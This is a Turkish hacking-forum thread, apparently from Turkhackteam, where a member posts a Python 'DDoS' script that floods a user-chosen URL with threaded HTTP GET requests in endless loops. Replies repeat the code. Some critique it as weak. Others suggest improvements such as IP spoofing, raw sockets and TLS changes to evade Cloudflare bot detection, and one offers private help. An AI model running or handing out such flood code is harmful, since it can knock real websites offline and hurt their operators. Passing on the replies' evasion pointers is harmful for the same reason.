Python Etkili DDoS Script

! Rew ?

Yeni üye
4 Eyl 2023
28
19
Selam dostlar,
Şimdiden söyliyim S tuşumda arıza var bazı yerlerde yazmayabilir.Anlayışınız için teşekkkür ederim.

Bugün "Socket" modülü kullanmadan etkili DDoS scripti hazırlayacaz.
İlk Önce Modüllerimi ekleyelim.

Python:
import requests
import threading
Güzel.Şimdi ise bir döngü kullanacağız.
Python:
def ddos(target):
    while True:
        try:
            requests.get(target)
        except:
            pass
Burda "Target" adlı fonksiyonumuz var ancak kullanıcıdan giriş birazdan isteyeceğiz.Buranın amacı ise hedef sitemize HTTP isteği göndermesidir.
Python:
def main():
    target = input('Enter target URL: ')
    thread_count = int(input('Enter number of threads: '))
Burada ise kullanıcıdan hedef URL mizi ve Port umuzu aldık.
Python:
for _ in range(thread_count):
        threading.Thread(target=ddos, args=(target,)).start()
Burasa ise Thread larımızı başlatıyoruz.NOT:Threadlerımızı def main() içerisine alınız yoka çalışmayabilir.
Python:
if __name__ == '__main__':
    main()
Buranın ne işe yaradığını tam yazarken unuttum:dNeyse bütün kodlar benimdir eğer başka bir yerde bu kodları görürseniz bana bildiriniz.

Bunjo

Uzman üye
14 Ara 2020
1,595
1,901
Faraday
Selam dostlar,
Şimdiden söyliyim S tuşumda arıza var bazı yerlerde yazmayabilir.Anlayışınız için teşekkkür ederim.

Python:
import requests
import threading
Python:
def ddos(target):
    while True:
        try:
            requests.get(target)
        except:
            pass
Burda "Target" adlı fonksiyonumuz var ancak kullanıcıdan giriş birazdan isteyeceğiz.Buranın amacı ise hedef sitemize HTTP isteği göndermesidir.
Python:
def main():
Python:
Burasa ise Thread larımızı başlatıyoruz.NOT:Threadlerımızı def main() içerisine alınız yoka çalışmayabilir.
Python:
    main()
Buranın ne işe yaradığını tam yazarken unuttum:dNeyse bütün kodlar benimdir eğer başka bir yerde bu kodları görürseniz bana bildiriniz.
Merhaba, bu bir DDoS saldırısı scripti değildir, DDoS saldırıları bir çok cihazdan yapılır.

ByFelez

Uzman üye
9 Tem 2013
1,818
1,774
Merhaba, bu bir DDoS saldırısı scripti değildir, DDoS saldırıları bir çok cihazdan yapılır.
Birden fazla Cihazda bunu çalıştırırsan ne olacak peki?

Bu konu için sana teşekkür ederim dostum. Aynı türde bir proje geliştirmek için bi ışık oldu :D

! Rew ?

Yeni üye
4 Eyl 2023
28
19
Bu konu için sana teşekkür ederim dostum. Aynı türde bir proje geliştirmek için bi ışık oldu :D
yardımım dokunduysa ne mutlu bana

Selam dostlar,

Python:
import requests
import threading
Python:
def ddos(target):
    while True:
        try:
            requests.get(target)
        except:
            pass
Python:
def main():
Python:
Python:
    main()
İsterseniz başka bir toolumu daha tanıtırım.

alexandre20

Katılımcı Üye
13 Tem 2022
920
720
Çok garip,bakan bile yok
ddos denilen işlem 2-3 satırlık python scriptleri ile yapılmadığı için olabilir mi acaba? Ne cloudflare geçer ne firewall geçer, ne ratelimit bypasslar, en ufak bir spoof işlemi yok, user-agenti "python-requests/1.0.0" olan ve arka arkaya gelen istekleri neredeyse bütün firewall'lar engeller. Bir adet (1) faydalı kullanım alanı yok bu script'in. Gidip vds alıp bunu çalıştırırsan ertesi güne bir ticket ile sunucu suspend edilir. Ev interneti ile zaten verebileceğin max zarar; türkiye interneti ile 5mbit civarı olur (pratik olarak sıfır).

cloudflare'in anti-bot detection'undan bahsetmiyorum bile, onu bypasslamak için komple sıfırdan konfigüre edilebilir TLS modülü yazıp cipher sıralamasını değiştirmen gerek (python ile yapamazsın xD). Bu yazdıklarımı bi chatgpt'ye sor sen yine de belki aydınlatır. Eğer 2000'li yılların başında falan olsaydık bu tür scriptler işe yarardı ama artık firewall sistemleri gelişti ve yazdığın 6 satırlık flood scriptin ile ancak local'deki ip adreslerine ddos atarsın

ArchieN

Underground Team Lider Yrd.
6 Eyl 2021
909
529
Saldırı Timleri
ddos denilen işlem 2-3 satırlık python scriptleri ile yapılmadığı için olabilir mi acaba? Ne cloudflare geçer ne firewall geçer, ne ratelimit bypasslar, en ufak bir spoof işlemi yok, user-agenti "python-requests/1.0.0" olan ve arka arkaya gelen istekleri neredeyse bütün firewall'lar engeller. Bir adet (1) faydalı kullanım alanı yok bu script'in. Gidip vds alıp bunu çalıştırırsan ertesi güne bir ticket ile sunucu suspend edilir. Ev interneti ile zaten verebileceğin max zarar; türkiye interneti ile 5mbit civarı olur (pratik olarak sıfır).

cloudflare'in anti-bot detection'undan bahsetmiyorum bile, onu bypasslamak için komple sıfırdan konfigüre edilebilir TLS modülü yazıp cipher sıralamasını değiştirmen gerek (python ile yapamazsın xD). Bu yazdıklarımı bi chatgpt'ye sor sen yine de belki aydınlatır. Eğer 2000'li yılların başında falan olsaydık bu tür scriptler işe yarardı ama artık firewall sistemleri gelişti ve yazdığın 6 satırlık flood scriptin ile ancak local'deki ip adreslerine ddos atarsın
Evet tam etkili bir tool olmayabilir ama herkes tam bilgi ile başlayacak değil arkadaşın ilerde neler yapacağını bilemeyiz arkadaşın eline sağlık.

alexandre20

Katılımcı Üye
13 Tem 2022
920
720
Evet tam etkili bir tool olmayabilir ama herkes tam bilgi ile başlayacak değil arkadaşın ilerde neler yapacağını bilemeyiz arkadaşın eline sağlık.
konu sahibinin "Çok garip,bakan bile yok" mesajına cevap olarak yazmıştım, asıl amacım konunun neden ilgi çekmediğini anlatmak ve yol göstermek.

! Rew ?

Yeni üye
4 Eyl 2023
28
19

Ben daha yeniyimde kendimi test edeyim dedim.Hatam için özür dilerim

Son düzenleme:

yuathay

Katılımcı Üye
7 Mar 2023
377
180
Gitti
Bi hatan yok bunu yazanda başlarken senin gibi kodlar yaziyodu herşey zamanla gelişir bugün bu kodu yazarsin yarın ufak bi kod daha yazarsin ve kodları birlestirirsin ve ortaya güzel bir çalışma çıkar eline sağlık tekrardan

Dr Ganca

Üye
2 Kas 2023
170
75
Greece
Yeni olup konuya ilgi beklemen normal neden özür diliyorsun ki?
socket kütüphanesini araştır birde ip spoofing için yazılmış bir python kütüphanesi vardı onuda muhakkak öğrenmen gerekiyor ve son olarak böyle araçları forumlarda yayımlarken çok dikkatli olmanı öneririm bazı durumlarda başın yanabilir soru sormak istersen özelden cevaplarım iyi geceler.

ZuL-RaA

Kadim Üye
9 Ara 2017
5,550
837
Semerkant
Merhaba,

Biraz inceleme yaptım konu üzerinde. Çok başarılı bir ddos atağı olmayacaktır. Ancak programların mantığını anlamak adına güzel olabilir.

Mesela requests kütüphanesi içinde "urllib3" ve "socket" modülü hali hazırda kullanılmaktadır. Sizin programın farklı fazladan kütüphane temin etmek oluyor bu kısımda.

Açıklama kısımları güzel ama yorum satırı kullanıp programın içine yazabilirsiniz. Github da da paylaşılabilir. Program da erkana arada durumu yazarsa biraz daha iyi olur. Daha iyi projeleri görmek adına :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.